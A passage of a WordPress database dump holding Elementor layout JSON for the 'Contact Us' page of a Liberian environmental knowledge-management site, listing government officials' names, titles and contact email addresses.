:50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement, EPA<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA, EPA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"9b01403\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong><br>\\n\\nEIA Manager, FDA<br>\\n\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Edward S. Kamara<\\/strong><br>\\n\\nMarketing and Forest Forecast<br>\\n\\n<a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Blamah Goll<\\/strong><br>\\nConservation Manager, FDA<br>\\n<a href=\\\"mailto:blamahg@yahoo.com\\\">blamag@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b2d79ff\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f970049\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"239344d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"6ab7cf6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Francis W. Mwah<\\/strong><br>\\n\\nDirector @ MOA<br>\\n\\n<a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John Willabo Johnson <\\/strong><br>\\n\\nAssistant Minister, MME<br>\\n\\n<a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Urias Garsinii <\\/strong><br>\\nLand Use Management Manager, LLA<br>\\n<a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Aaron S.M. Wesseh<\\/strong><br>\\n\\nManager, CCCD Project<br>\\n\\n<a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"310af85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"8523c31\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(14884,2363,'_elementor_edit_mode','builder'),(14885,2363,'_elementor_template_type','wp-page'),(14886,2363,'_elementor_version','2.7.5'),(14887,2363,'_wp_page_template','default'),(14888,2363,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk.<\\/a>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a3861ab\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"20\"},\"elements\":[{\"id\":\"65e4128\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d8b2d45\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_manager_UV.jpg\",\"id\":2315},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"aa147aa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact Form Coming up\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BJ-1.jpg\",\"id\":2357},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0aaead\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0aa0634\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"56a5d75\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>J.S. Datuama Cammue<\\/strong><br>\\n\\nMEAs Officer, EPA<br>\\n\\nUNCBD Focal Point<br>\\n\\n<a href=\\\"mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"f847b48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"643defa\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Benjamin Karmorh<\\/strong><br>\\n\\nMEAs Coordinator, EPA<br>\\n\\nUNFCCC Focal Point<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"509b314\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"98a945e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Berexford S. Jallah<\\/strong><br>\\nGIS Coordinator, EPA<br>\\nUNCCD Focal Point<br>\\n<a href=\\\"mailto:bjallah@epa.gov.lr\\\">bjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73bdb81\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6710f3e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"84a6f95\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"391549e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4c9c6f3\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_KT.jpg\",\"id\":2360},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6b5064d\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}],\"structure\":\"30\"},\"elements\":[{\"id\":\"0ffa3a0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4adfd45\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Jeremiah Sokan Sr<\\/strong>\\n\\nCoordinator Climate Change Secretariat, EPA\\n\\n<a href=\\\"mailto:jjallah@epa.gov.lr\\\">jjallah@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5d6e5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"46e908a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>John K. Jallah<\\/strong><br>\\n\\nManager, Compliance and Enforcement, EPA<br>\\n\\n<a href=\\\"mailto:bkarmorh@epa.gov.lr\\\">bkarmorh@epa.gov.lr<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c31131b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"65f189c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Kawusu Toure<\\/strong><br>\\nAssistant Manager, ESIA, EPA<br>\\n<a href=\\\"mailto:kawumtoure@gmail.com\\\">kawumtoure@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"96e03da\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_para